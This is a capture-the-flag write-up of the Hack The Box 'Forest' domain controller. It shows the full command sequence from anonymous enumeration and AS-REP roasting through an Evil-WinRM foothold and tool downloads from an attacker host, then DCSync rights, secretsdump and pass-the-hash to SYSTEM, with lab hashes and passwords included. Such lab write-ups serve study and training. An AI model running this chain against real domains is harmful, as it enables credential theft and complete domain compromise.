Forest #1 AD

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.161  

53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-22 02:13:22Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/21%OT=53%CT=1%CU=39143%PV=Y%DS=2%DC=I%G=Y%TM=658
OS:4EF61%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=10B%TI=I%CI=I%TS=A)SEQ(S
OS:P=FC%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=FC%GCD=1%ISR=10C%TI=I
OS:%CI=I%II=I%SS=S%TS=A)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O
OS:4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=
OS:2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q=)T1(R=
OS:Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%R
OS:D=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=
OS:G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-12-21T18:13:58-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h46m49s, deviation: 4h37m10s, median: 6m48s
| smb2-time: 
|   date: 2023-12-22T02:13:55
|_  start_date: 2023-12-22T02:10:33
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.161 

53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp

┌──(kali💀kali)-[~]
└─$ nmap -p- --min-rate 10000 10.10.10.161 

53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49684/tcp open  unknown
49703/tcp open  unknown
49980/tcp open  unknown

Merging the default TCP scan, the full-range TCP scan and the UDP scan gives 23 open TCP ports and 3 open UDP ports. Note that the fast full-range scan (--min-rate 10000) missed 464 and 3269, which the slower default scan found; a high packet rate drops responses, so the two result sets have to be combined rather than trusting either one alone.

  • Port 53 (TCP and UDP): DNS (Simple DNS Plus)

  • Port 88 (TCP and UDP): Microsoft Windows Kerberos

  • Port 123 (UDP): NTP

  • Ports 135 & 593: Microsoft Windows RPC (593 is RPC over HTTP); ports 49664 to 49980: RPC endpoints in the dynamic port range

  • Ports 139 & 445: SMB, with message signing required

  • Ports 389 & 636: Active Directory LDAP and LDAPS; ports 3268 & 3269: Global Catalog LDAP and LDAPS (nmap shows the TLS ports as tcpwrapped, which only means the TCP handshake completed and the service closed the connection before the probe got a banner)

  • Port 464: kpasswd (Kerberos password change)

  • Port 9389: Active Directory Web Services (.NET message framing)

  • Port 47001: the HTTP.sys listener used by WinRM. The WinRM service port itself, 5985, does not appear in either scan, but the Evil-WinRM session later in this write-up shows it is reachable.

Before we move on to enumeration, let’s make some mental notes about the scan results.

  • Kerberos (88), LDAP and Global Catalog (389, 636, 3268, 3269), kpasswd (464) and ADWS (9389) on one host mean this is not just a domain-joined Windows box but the Domain Controller for htb.local.

  • The nmap scan leaks the domain and hostname: htb.local and FOREST.htb.local. Similarly, the smb-os-discovery script leaks the operating system: Windows Server 2016 Standard 14393. The smb-security-mode script also reports account_used: guest, so the DC accepted an unauthenticated guest SMB session, which is a good sign that anonymous enumeration will work.

  • Port 389 is running LDAP. We’ll need to query it for any useful information. Same goes for SMB.

  • WinRM is listening (47001 in the scan, 5985 in practice). If we find credentials through SMB or LDAP, we can use it to get a remote shell on the box.

  • nmap reports several minutes of clock skew between us and the DC. Kerberos tolerates 5 minutes by default, so before using Kerberos tickets from the attack box (for example Impacket’s -k option) sync the clock against the DC; port 123/udp is open for that.

Enumeration:

Port 389 LDAP

We’ll start off with enumerating LDAP. Nmap has an NSE script that enumerates LDAP.

┌──(kali💀kali)-[~]
└─$ locate ldap-search
/usr/share/nmap/scripts/ldap-search.nse

Let’s run the script on port 389.

┌──(kali💀kali)-[/usr/share/nmap/scripts]
└─$ nmap -p 389 --script ldap-search.nse 10.10.10.161

We get a bunch of results, which I have truncated. The query is unauthenticated, so the fact that it returns user objects at all means the DC allows anonymous LDAP binds, which is a finding in its own right. Notice that it leaks first names, last names and e-mail addresses through the Exchange attribute msExchUMDtmfMap, which stores them as telephone keypad digits (2 = ABC, 3 = DEF and so on). This is not directly reversible, since several letters share one digit, but it is easily matched against a list of candidate names. However, before I start writing a script to convert the numbers back to names, I’m going to enumerate other ports to see if I can get names from there.
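Here is the matching script the paragraph above defers, as an added example (my code, not from the original write-up). It encodes candidate names into the DTMF form Exchange uses and compares them against the digit strings LDAP leaked, so the many-to-one mapping is handled by search rather than by trying to invert it. The digit strings and name lists in the block are constructed for illustration, and the assumption that the map simply drops non-alphanumeric characters such as the hyphen in svc-alfresco is mine.

```python
"""Matching msExchUMDtmfMap values back to names (added example; not from the
original write-up).

Exchange stores each mailbox user's names and e-mail alias as telephone keypad
digits (2=ABC, 3=DEF, ... 9=WXYZ).  The mapping is many-to-one, so a digit
string cannot be decoded directly; instead, encode candidate names and compare.
The values in SAMPLE_DTMF_MAP are constructed, not taken from the box, and the
assumption that non-alphanumeric characters are dropped is ours.
"""
from itertools import product

# ITU E.161 keypad layout; digits in a name map to themselves.
_KEYPAD = {"2": "abc", "3": "def", "4": "ghi", "5": "jkl",
           "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz"}
_LETTER_TO_DIGIT = {ch: d for d, letters in _KEYPAD.items() for ch in letters}


def dtmf_encode(text: str) -> str:
    """Encode text the way the UM DTMF map does: letters to keypad digits,
    digits kept, anything else dropped (assumption, see module docstring)."""
    out = []
    for ch in text.lower():
        if ch in _LETTER_TO_DIGIT:
            out.append(_LETTER_TO_DIGIT[ch])
        elif ch.isdigit():
            out.append(ch)
    return "".join(out)


def parse_dtmf_map(values):
    """Group 'field:digits' entries (emailAddress, lastNameFirstName,
    firstNameLastName) as they appear in msExchUMDtmfMap."""
    parsed = {}
    for value in values:
        field, sep, digits = value.partition(":")
        if sep and digits.isdigit():
            parsed.setdefault(field, []).append(digits)
    return parsed


def dtmf_candidates(digits: str, wordlist) -> list:
    """Every word whose DTMF encoding equals `digits` (often more than one)."""
    return sorted({w for w in wordlist if dtmf_encode(w) == digits})


def recover_name_pairs(digits: str, first_names, last_names, last_first=True) -> list:
    """Candidate (first, last) pairs for a lastNameFirstName entry (default) or a
    firstNameLastName entry.  Brute-forces every pair from the two wordlists,
    which is cheap for the few hundred names a small domain leaks."""
    pairs = set()
    for first, last in product(first_names, last_names):
        joined = last + first if last_first else first + last
        if dtmf_encode(joined) == digits:
            pairs.add((first, last))
    return sorted(pairs)


# Constructed sample: a user "andy" whose surname encodes to 223.
SAMPLE_DTMF_MAP = [
    "emailAddress:2639",          # andy
    "lastNameFirstName:2232639",  # <surname> + andy
    "firstNameLastName:2639223",  # andy + <surname>
]
FIRST_NAMES = ["andy", "mark", "santi", "lucinda", "sebastien"]
LAST_NAMES = ["abe", "ace", "smith"]  # abe and ace both encode to 223

if __name__ == "__main__":
    entries = parse_dtmf_map(SAMPLE_DTMF_MAP)
    for digits in entries["emailAddress"]:
        print("emailAddress", digits, "->", dtmf_candidates(digits, FIRST_NAMES))
    for digits in entries["lastNameFirstName"]:
        print("lastNameFirstName", digits, "->",
              recover_name_pairs(digits, FIRST_NAMES, LAST_NAMES))
```

Feed it the msExchUMDtmfMap values from the ldap-search output and the first and last names harvested elsewhere (enum4linux, the user list below). The emailAddress entry is the mailbox alias and is the most useful one, since on many domains it is the same string as the SAM account name; the name pairs come back with their ambiguities intact, which is why the result is a candidate list rather than a single answer.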

Next we’ll run enum4linux, a tool for enumerating information from Windows and Samba systems. It’s a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup, and with the -l option it can also query LDAP. We pass no credentials, so everything below came back over a null session, which is itself worth noting: an anonymous RPC session should not be able to list domain groups and their members.

┌──(kali💀kali)-[~/Desktop]
└─$ enum4linux 10.10.10.161

[+]  Getting domain group memberships:                                                          
                                                                                                
Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem    
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
Group: 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
Group: 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator

Take the above usernames and save them in the file usernames.txt.

┌──(kali💀kali)-[~/Desktop]
└─$ cat usernames.txt
Administrator
DefaultAccount
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
santi
rc
ln

Now I have a bunch of usernames but no passwords. If Kerberos pre-authentication is disabled on any of the above accounts, we can use the Impacket script GetNPUsers.py to send an AS-REQ for that user without the pre-authentication timestamp. The KDC answers with an AS-REP anyway. The ticket inside it is encrypted with the krbtgt key and is useless to us, but the reply’s encrypted part (the session key and ticket metadata) is encrypted with a key derived from the user’s password, and with RC4-HMAC that key is simply the NT hash. That encrypted blob can be taken offline and brute-forced, which is what AS-REP roasting is.

When I first did this box, I assumed the Impacket script requires a username as a parameter and therefore ran the script on all the usernames that I found. However, it turns out that you can use the script to output both the vulnerable usernames and their corresponding encrypted TGTs.

┌──(kali💀kali)-[~/Desktop]
└─$ GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request

Name          MemberOf                                                PasswordLastSet      LastLogon            UAC      
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-12-21 22:50:46  2019-09-23 07:09:47  0x410200 

$krb5asrep$23$svc-alfresco@HTB.LOCAL:8b9478fb067ed6225012ab7f4a8673a4$82192559bc2eb3879918ef63cfc307731555734da50423cd4ed5793d1ac65ff0e6d30306a2e1994070c7e6c7ccbd9696034555a7f7de4bb3f59c60bee26105e85d43e7bf0ad0a0a02a83f62ea9a59063841d328a8b3a5410e64112be66735cc93c1b8b53b1f61687490d4a6aa56c4f455c42f7b165cda308461473ce001d33c512c8bad9994585fa33ff3bfd2896ff207e80ba886c91a928dd4403163958afc9ef12994a4f7128e1106aa8ef2dae3a949f66adf01fc0dfe49f83900b9638dfd5dfeff55ec2ff7d0e6d424b14ba5f54576ef75f7caeb20e24bc84dfa83830d1284f9857460003

The Kerberos pre-authentication option has been disabled for the user svc-alfresco and the KDC handed back the AS-REP’s encrypted part, keyed by the user’s password, already in john/hashcat format. The UAC value 0x410200 confirms it: it is NORMAL_ACCOUNT (0x200) + DONT_EXPIRE_PASSWORD (0x10000) + DONT_REQ_PREAUTH (0x400000). Without a username list, the script found this account by searching LDAP itself, which again only works because anonymous binds are allowed. Save the hash in the file hash.txt.

┌──(kali💀kali)-[~/Desktop]
└─$ nano hash.txt 

┌──(kali💀kali)-[~/Desktop]
└─$ cat hash.txt     
$krb5asrep$23$svc-alfresco@HTB.LOCAL:8b9478fb067ed6225012ab7f4a8673a4$82192559bc2eb3879918ef63cfc307731555734da50423cd4ed5793d1ac65ff0e6d30306a2e1994070c7e6c7ccbd9696034555a7f7de4bb3f59c60bee26105e85d43e7bf0ad0a0a02a83f62ea9a59063841d328a8b3a5410e64112be66735cc93c1b8b53b1f61687490d4a6aa56c4f455c42f7b165cda308461473ce001d33c512c8bad9994585fa33ff3bfd2896ff207e80ba886c91a928dd4403163958afc9ef12994a4f7128e1106aa8ef2dae3a949f66adf01fc0dfe49f83900b9638dfd5dfeff55ec2ff7d0e6d424b14ba5f54576ef75f7caeb20e24bc84dfa83830d1284f9857460003

Crack the hash using John the Ripper (hashcat mode 18200 handles the same format).

┌──(kali💀kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL) 

John recovers the password s3rvice. Note that the cracked line is etype 23 (RC4-HMAC), where each guess costs one MD4 and a few HMAC-MD5 operations; if the account had only AES keys (etypes 17/18) each guess would cost a PBKDF2 derivation with 4096 iterations and the crack would be orders of magnitude slower. Accounts with pre-authentication disabled and RC4 still enabled are the cheap target.

Foothold:

EVIL-WINRM

Now that we have the username/password svc-alfresco/s3rvice, we’ll use Evil-WinRM (a Ruby WinRM client) to gain an initial foothold on the box. This works because WinRM is exposed (port 47001 in the nmap scan, with the service itself on 5985) and because the account is allowed to log on over WinRM, which the successful connection below confirms; a plain domain user without that right would be refused even with valid credentials.

┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p 's3rvice'

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> whoami
htb\svc-alfresco

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4-------------------------------

Privilege Escalation:

Enumerate the users on the domain.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user /domain

User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            andy
DefaultAccount           Guest                    HealthMailbox0659cc1
HealthMailbox670628e     HealthMailbox6ded678     HealthMailbox7108a4e
HealthMailbox83d6781     HealthMailbox968e74d     HealthMailboxb01ac64
HealthMailboxc0a90c9     HealthMailboxc3d7722     HealthMailboxfc9daad
HealthMailboxfd87238     krbtgt                   lucinda
mark                     santi                    sebastien
SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb     SM_2c8eef0a09b545acb
SM_681f53d4942840e18     SM_75a538d3025e4db9a     SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b     SM_ca8c2ed5bdab4dc9b
svc-alfresco

Enumerate the user account we’re running as.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user svc-alfresco
User name                    svc-alfresco
Full Name                    svc-alfresco
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/21/2023 8:17:41 PM
Password expires             Never
Password changeable          12/22/2023 8:17:41 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/21/2023 7:50:49 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Service Accounts
The command completed successfully.

The user is part of the Service Accounts group. Let’s run BloodHound to see if there are any exploitable paths. First, download SharpHound.exe (BloodHound’s collector) and start a web server in the directory it resides in. Kali’s python is Python 3, so use http.server (the Python 2 equivalent was SimpleHTTPServer):

┌──(kali💀kali)-[~/Desktop]
└─$ python3 -m http.server 5555

In the target machine, download the executable.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.14.3:5555/SharpHound.exe', 'C:\Users\svc-alfresco\Desktop\SharpHound.exe')

Then run the program.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ./Sharphound.exe

This outputs two files: the ZIP with the collected JSON, and a .bin file that is SharpHound’s cache of resolved principals, which we don’t need.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
    Directory: C:\Users\svc-alfresco\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/21/2023   8:32 PM          34541 20231221203205_BloodHound.zip
-a----       12/21/2023   8:32 PM          77788 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----       12/21/2023   8:31 PM        1342464 SharpHound.exe
-ar---        9/23/2019   2:16 PM             32 user.txt

We need to transfer the ZIP file to our attack machine. Evil-WinRM has a built-in download command that does this directly, but it is also easy to base64 encode the file with certutil. Use the file name from the listing above.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> certutil -encode 20231221203205_BloodHound.zip test.txt

Then output the base64 encoded file.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type test.txt

Copy it into a file of the same name on the attack machine and decode it. certutil wraps its output in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines, which base64 -d rejects, so strip them first:

┌──(kali💀kali)-[~/Desktop]
└─$ grep -v CERTIFICATE test.txt | base64 -d > bloodhound-result.zip

BLOODHOUND:

To install Bloodhound on Kali, you can apt install bloodhound. But to get an older version, I’ll build it from source.

  • From /opt/, I’ll run git clone https://github.com/BloodHoundAD/BloodHound.git to check out the code from git.

  • cd BloodHound to get into the directory

  • Looking at the release page, it looks like the last 1.x version was 1.52, around April 13. I found a commit that was from that timeframe, and checked it out with git checkout a3d5d02226.

  • Then I ran the commands from the project’s page on building from source: https://github.com/BloodHoundAD/BloodHound/wiki/Building-BloodHound-from-source

The next steps are the same for apt installation or building from source:

  • Run neo4j console, which opens the neo4j web interface

  • Log in at http://127.0.0.1:7474/ with username/password “neo4j”/”neo4j”. You’ll have to change your password on login. Close the window (but don’t exit neo4j in the console).

  • Run bloodhound from a new terminal window. Log in with the creds you just set

Alright, now that we have the zipped file on our attack machine, we need to get it into BloodHound. First start the neo4j database.

┌──(kali💀kali)-[~/Desktop]
└─$ sudo neo4j console   

Then run bloodhound.

┌──(kali💀kali)-[~]
└─$ bloodhound

Load the data by clicking the Upload Data button on the right side, or by dragging and dropping the ZIP into the window. Then:

  • Search for svc-alfresco, right click the user node and select “Mark User as Owned”.

  • From the pre-built queries, run “Shortest Paths from Owned Principals”. “Find Shortest Paths to Domain Admins” gives the same picture from the other end.

We can see that svc-alfresco is a member of the group Service Accounts, which is nested in Privileged IT Accounts, which is nested in Account Operators. Moreover, the Account Operators group has GenericAll on the Exchange Windows Permissions group, which in turn has WriteDacl on the domain object.

  • Group membership is transitive, so svc-alfresco is not just a member of Service Accounts but effectively a member of Privileged IT Accounts and of the built-in Account Operators group, and holds every right those groups hold.

  • Account Operators grants limited account creation privileges: its members can create users and groups and manage groups other than the administrative ones. Therefore the user svc-alfresco can create other users on the domain. https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators

  • GenericAll on the Exchange Windows Permissions group means full control of that object, including the right to change its membership. Since svc-alfresco is (transitively) in Account Operators, he can add arbitrary principals to Exchange Windows Permissions.

  • WriteDacl on the domain object means a member of Exchange Windows Permissions can rewrite the domain’s ACL and grant any principal the two extended rights a DC checks before answering replication requests, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. That is exactly what DCSync needs.

Exploit

Putting all the pieces together, the following is our attack path.

  • Create a user on the domain. This is possible because svc-alfresco is (transitively) a member of the group Account Operators.

  • Add the user to the Exchange Windows Permissions group. This is possible because Account Operators has GenericAll on that group.

  • Give the user DCSync privileges, i.e. the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object. This is possible because the user is now a member of Exchange Windows Permissions, which has WriteDacl on htb.local.

  • Perform a DCSync attack: ask the DC, over the DRSUAPI replication interface, for the password hashes of every account, exactly as another DC would.

  • Pass the Administrator’s NT hash to get an administrative shell.

We could equally add svc-alfresco itself to the group, but a logon token is built at logon, so the current WinRM session would not pick up the new membership; a fresh user we can authenticate as is simpler. Keep in mind that user creation and membership changes on a group like Exchange Windows Permissions are logged and commonly alerted on, so on a real engagement this is noisy and needs cleaning up afterwards.

Create a user on the domain.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user exodus password /add /domain

Confirm that the user was created.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user /domain

User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            andy
DefaultAccount           exodus                   Guest
HealthMailbox0659cc1     HealthMailbox670628e     HealthMailbox6ded678
HealthMailbox7108a4e     HealthMailbox83d6781     HealthMailbox968e74d
HealthMailboxb01ac64     HealthMailboxc0a90c9     HealthMailboxc3d7722
HealthMailboxfc9daad     HealthMailboxfd87238     krbtgt
lucinda                  mark                     santi
sebastien                SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb     SM_681f53d4942840e18     SM_75a538d3025e4db9a
SM_7c96b981967141ebb     SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b     svc-alfresco
The command completed with one or more errors.

Add the user to the Exchange Windows Permissions group.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net group "Exchange Windows Permissions" /add exodus

Confirm that the user was added to the group.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user exodus
User name                    exodus
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/22/2023 12:42:25 AM
Password expires             Never
Password changeable          12/23/2023 12:42:25 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Exchange Windows Perm *Domain Users
The command completed successfully.

PowerView

Give the user DCSync privileges. We’ll use PowerView for this. First download PowerView.ps1 and serve it from the directory it resides in.

┌──(kali💀kali)-[~/Desktop]
└─$ python3 -m http.server 5555

Then download the script on the target machine.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.14.3:5555/PowerView.ps1', 'C:\Users\svc-alfresco\Desktop\PowerView.ps1')

Load PowerView into the session and use its Add-DomainObjectAcl function to give the user DCSync privileges. Two details matter here. The script has to be dot-sourced before its functions exist in the session. And the ACL change must be made as exodus, not as svc-alfresco, because only exodus is in Exchange Windows Permissions, which is why the function is called with an explicit credential. -Rights DCSync makes PowerView add the DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set extended rights for the principal; PowerView’s Get-DomainObjectAcl on the domain object, with -ResolveGUIDs, should show them for exodus afterwards.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $pass = ConvertTo-SecureString 'password' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $cred = New-Object System.Management.Automation.PSCredential('htb\exodus', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity exodus -Rights DCSync

SecretsDump

On the attack machine, use Impacket’s secretsdump as exodus to dump the password hashes of all the users on the domain. The rpc_s_access_denied line in the output is expected and harmless: secretsdump first tries the remote-registry route (SAM and LSA secrets), which needs local admin, fails, and then falls back to the DRSUAPI replication method, which only needs the replication rights we just granted. Adding -just-dc-ntlm skips the first attempt and prints only the NT hashes from NTDS.

┌──(kali💀kali)-[~/Desktop]
└─$ sudo impacket-secretsdump htb.local/exodus:password@10.10.10.161
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

PSEXEC

Use Impacket’s psexec.py to pass the Administrator’s NT hash (the LM half, aad3b435b51404eeaad3b435b51404ee, is the empty-LM placeholder) and get a shell. psexec.py uploads a service binary to ADMIN$ and runs it as SYSTEM, so it needs local admin on the target and is loud; wmiexec.py with the same -hashes argument is a quieter alternative.

┌──(kali💀kali)-[~/Desktop]
└─$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
C:\Users\Administrator\Desktop>type root.txt
f04815-------------------------------
